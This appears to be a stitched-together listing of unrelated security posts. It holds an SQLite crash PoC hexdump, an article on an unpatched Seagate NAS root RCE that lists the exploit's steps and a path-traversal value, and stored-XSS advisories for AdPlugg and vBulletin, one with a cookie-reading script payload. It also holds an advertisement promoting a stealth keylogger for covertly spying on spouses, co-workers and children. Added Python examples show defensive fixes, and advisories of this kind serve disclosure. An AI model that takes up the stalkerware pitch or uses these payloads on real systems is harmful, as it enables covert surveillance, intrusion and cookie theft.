   0x00007ffff7b5b136 <sqlite3_load_extension+742>:  lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
End of assembler dump.

====

andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d

Source
  22. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers.

Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet.

Seagate is one of the world's largest vendors of hardware solutions, with products available worldwide. After Western Digital, Seagate ranks second and holds 41% of the market worldwide in supplying storage hardware products.

A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and reported it to the company, totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now.

In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device, which gives the attacker root access to the vulnerable device without the need of a valid login. Reeves also released a Python exploit along with its Metasploit module version, which is available on GitHub.

ORIGIN OF ZERO-DAY VULNERABILITY

Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators perform device configuration functions such as adding users, setting up access control, managing files, and more.

This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions.

PHP version 5.2.13 is vulnerable (CVE-2006-7243), which allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension.

CodeIgniter versions prior to 2.2.0 are vulnerable (CVE-2014-8686), which allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, the attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server.

The custom web application authenticates the logged-in user based upon browser cookies, having three parameters:

- username: logged in user name
- is_admin: user is admin or not i.e. Yes or No
- language: chosen language (e.g. en_US)

The researcher explained that there is no further validation of user credentials at the server end once the username cookie is established, which could be impersonated easily by an attacker. Another parameter, 'is_admin', can be manipulated to the value 'Yes', which allows the attacker to self-elevate to administrative privileges in the web application itself.

The language parameter can be manipulated for exploitation of a local file inclusion vulnerability.

At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as the root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as the root user.

VULNERABLE PRODUCTS

Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware versions listed below are affected by this zero-day vulnerability:

- Business Storage 2-Bay NAS version 2014.00319
- Business Storage 2-Bay NAS version 2013.60311

However, Reeves believes that all versions of the Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability.

METASPLOIT MODULE AVAILABLE

A Metasploit module and a Python script to exploit the vulnerability automatically are available on GitHub. Each of these scripts is able to perform the following tasks:

1. Connects to the vulnerable NAS device and extracts a ci_session cookie.
2. Decrypts the cookie using the static encryption key and extracts the PHP hash.
3. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'.
4. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator.
5. Performs a request to extract the host configuration, which includes the device's description.
6. Modifies the host configuration so that the device description contains a small stager payload.
7. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc.
8. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00.
9. Encrypts this new PHP hash ready for future use as a ci_session cookie.
10. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root.
11. Performs another request which then resets the host configuration back to what it was prior to exploitation.

According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times.

Users of Seagate's Business Storage NAS products and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface.

Source
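The three cookie parameters described in the article (username, is_admin, language) carry the authorisation decision in the browser, so anyone who can decrypt and re-encrypt the cookie decides their own privilege and which file is included. The following added example, written for this listing and not Seagate's or CodeIgniter's code, contrasts that pattern with the usual remedy: the cookie holds only an opaque random session id, privilege is read from a server-side record, and the language value is mapped through an allowlist before it touches a path. The user table, language set and path layout are constructed.

```python
import secrets
from typing import Dict, Optional

# Constructed user table: username -> (password, is_admin). Invented for the demonstration.
USERS = {"admin": ("correct horse", True), "guest": ("battery staple", False)}
# Server-side session store: opaque session id -> record. Only the id is sent to the browser.
SESSIONS: Dict[str, Dict[str, object]] = {}
# Constructed allowlist of shipped translations.
LANGUAGES = {"en_US", "de_DE", "fr_FR"}


def flawed_is_admin(cookie_fields: Dict[str, str]) -> bool:
    """The pattern the article describes: privilege is whatever the browser's cookie says."""
    return cookie_fields.get("is_admin") == "yes"


def login(username: str, password: str) -> Optional[str]:
    """Verify credentials and return a fresh random session id to set as the cookie."""
    record = USERS.get(username)
    if record is None or not secrets.compare_digest(record[0], password):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"username": username, "is_admin": record[1]}
    return sid


def is_admin(cookie: str) -> bool:
    """Privilege comes from the server-side record, never from cookie contents: a cookie
    that is not a known session id, however it is formatted, is just an anonymous request."""
    session = SESSIONS.get(cookie)
    return bool(session and session["is_admin"])


def language_file(requested: str) -> str:
    """Map the language cookie to a file through an allowlist, so it can only ever select
    one of the shipped translations, never a path of the client's choosing."""
    language = requested if requested in LANGUAGES else "en_US"
    return f"lang/{language}.php"


if __name__ == "__main__":
    sid = login("guest", "battery staple")
    print("guest is admin:", is_admin(sid))
    print("forged cookie is admin:", is_admin("username=admin;is_admin=yes;language=en_US"))
    print("language for a traversal value:", language_file("../../../../etc/devicedesc\x00"))
```

Note what this design removes rather than adds: there is no cookie encryption key to recover, because nothing in the cookie is worth decrypting, and the language cookie can no longer name a file because it is only ever used as a dictionary lookup.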
  23. =====================================================
Stored XSS Vulnerability in ADPlugg Wordpress Plugin
=====================================================

.. contents:: Table Of Content

Overview
========

* Title : Stored XSS Vulnerability in ADPlugg Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and mostly prior to it
* Version Tested : 1.1.33
* Version patched: 1.1.34

Description
===========

Vulnerable Parameter
--------------------

* Access Code

About Vulnerability
-------------------

This plugin is vulnerable to a Stored cross site scripting vulnerability. This issue is exploited when administrator users have access to the AdPlugg settings in WordPress; the Access Code parameter is vulnerable to stored XSS. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.

Vulnerability Class
===================

Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce: (POC)
=========================

After installing the plugin:

* Go to Settings --> AdPlugg
* Put this payload in Access Code: "><script>alert(document.cookie)</script>
* Click on Save Changes; you will see the XSS in action
* Reload the page or navigate to the page again to make sure it is stored

Mitigation
==========

Update to Version 1.1.34

Change Log
==========

https://wordpress.org/plugins/adplugg/changelog/

Disclosure
==========

18-February-2015 Reported to developer
19-February-2015 Developer acknowledged the bug
19-February-2015 Developer patched the bug and pushed an update
21-February-2015 Public Disclosure

credits
=======

* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Source
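The three stored-XSS advisories in this listing (Device Expert's Login Name, the Yoast settings fields, and AdPlugg's Access Code) share one root cause: a saved value is written back into the settings or user-list page without output encoding. The following added example, written for this listing and not code from any of those plugins, shows the flawed rendering beside the escaped one and uses Python's own HTML parser to show what a browser would make of each; the two payloads are the ones quoted in the Device Expert and AdPlugg advisories, and the field names are constructed.

```python
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple


def render_setting_field_unsafe(name: str, stored: str) -> str:
    """The flawed pattern behind these advisories: the saved value is interpolated into the
    markup as-is, so a value containing '">' ends the attribute and whatever follows is
    parsed as new tags."""
    return f'<input type="text" name="{name}" value="{stored}">'


def render_setting_field(name: str, stored: str) -> str:
    """Attribute context: escape & < > " and ' before interpolating, so the browser treats
    the whole value as the attribute's data (the role of esc_attr() in WordPress)."""
    return (f'<input type="text" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(stored, quote=True)}">')


def render_user_cell(login_name: str) -> str:
    """Text context (a table cell listing users): escape so markup is displayed, not parsed."""
    return f"<td>{html.escape(login_name)}</td>"


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, the way a browser builds its DOM."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {k: (v if v is not None else "") for k, v in attrs}))


def parse_tags(markup: str) -> List[Tuple[str, Dict[str, str]]]:
    """Tags a browser-like parser extracts from rendered markup, with attribute values decoded."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    access_code = '"><script>alert(document.cookie)</script>'          # AdPlugg advisory payload
    login_name = "<BODY ONLOAD=alert('Hacked_ByS3curity_B3ast')>"      # Device Expert payload
    print("unsafe:", [t for t, _ in parse_tags(render_setting_field_unsafe("access_code", access_code))])
    print("escaped:", [t for t, _ in parse_tags(render_setting_field("access_code", access_code))])
    print("user cell:", [t for t, _ in parse_tags(render_user_cell(login_name))])
```

The parser check is the useful part: with escaping, the only tag that exists is the input, and its decoded value attribute is byte-for-byte the stored string, so the setting still round-trips correctly; without it, a second tag (script or body) appears in the tree. Note that attribute and text contexts need different escaping and neither is right for a JavaScript or URL context.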
  24. Do you want to know what your buddy or co-workers are doing online? Or perhaps you want to check up on your children or spouse and know what they are doing on the computer? With Perfect Keylogger it is possible in just 2 minutes! This program runs on the installed computer, fully hidden from its users, and logs everything that is typed in a protected file. Install Perfect Keylogger and find out the Truth!

Perfect Keylogger is a new generation keylogger which is virtually undetectable. It was created as an alternative to very expensive commercial products like Spector Keylogger or E-Blaster. It has similar functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and use it immediately without messing with settings.

Perfect Keylogger is a popular award-winning tool, translated into 20+ languages. It lets you record all keystrokes, the time they were made and the application where they were entered. It works in absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.

Our keylogger has a unique remote installation feature. You can create a pre-configured package for instant and stealth installation on the target computer. The new Smart Rename feature lets you rename all the keylogger's executable files and registry entries using one keyword!

One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and the keylogger will continually monitor keyboard typing, URLs and web pages for these words or phrases. You tell Perfect Keylogger which phrases to watch out for - for example, "sex," "porno", "where do you live," "are your parents home," "is your wife sleeping," "I hate my boss" - whatever you decide to include. When a keyword is detected, Perfect Keylogger makes a screenshot and immediately sends an email notification to you.

Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows 7/Vista/XP Task Manager! Now we are glad to offer full Windows 64-bit support - you won't find it in most competing products.

The program lets you easily view the log file, displaying the title of the window (for example, title: "John (Online) - Message Session" in Yahoo IM), the date and time of the action and the contents of the typed matter itself.

Unlike some other spy software products, Perfect Keylogger does not send any information to our company. Only you will receive the log files. We guarantee absolute privacy, a high quality product and technical support - that's why we have thousands of satisfied customers. You pay once, all updates are free. For example, customers who bought the first version in 2002 can now get the advanced latest version for free! You can be sure that you will always have the most modern spy software!

We have to tell you that such software is very complex and only 2-3 products on the market, including this one, are of good enough quality to be used effectively. Do not use cheap or free monitoring software! You can get important data leaks or system crashes! We can guarantee your system safety with our product.

Perfect Keylogger is available in three editions: full version, full version remote edition and basic edition. Choose the functionality you need.

Supported platforms for Perfect Keylogger: Windows 2000, Windows XP (32-bit and x64), Windows Server 2003/2008, Windows Vista (32-bit and x64), Windows 7, Windows 8 / 8.1 (32-bit and x64); older versions of Windows are supported with older builds of the product.

Minimum requirements for Perfect Keylogger: Windows XP or later (older versions are also available)

Home Page - Perfect Keylogger for Windows 8/7/XP - Remote Monitoring Software. Download invisible keylogger now. Free trial

Source: BlazingTools Perfect Keylogger Remote Edition 1.93

PS: It is not verified because it was not uploaded by me; I just found the program on this site. I have used this site before and I can see there are no viruses, but it doesn't hurt to check. By the way, which one is better: this or Ardamax?
  25. CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4
Tested Version: 5.1.3 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
  CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
  Impact Subscore: 2.9
  Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

Advisory Details:

(1) Vendor & Product Description:

Vendor: vBulletin

Product & Version: vBulletin Forum 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4

Vendor URL & Download: vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/

Product Introduction:

"vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server."

"Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3."

(2) Vulnerability Details:

vBulletin has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at the "forum/help" page. Add "hash symbol" first. Then add script at the end of it.
References:

* http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
* http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
* https://security-tracker.debian.org/tracker/CVE-2014-9469
* http://www.cvedetails.com/cve/CVE-2014-9469/
* http://www.security-database.com/detail.php?alert=CVE-2014-9469
* http://packetstormsecurity.com/files/cve/CVE-2014-9469
* http://www.pentest.it/cve-2014-9469.html
* http://www.naked-security.com/cve/CVE-2014-9469/
* http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
* http://007software.net/cve-2014-9469/
* http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
* https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

Source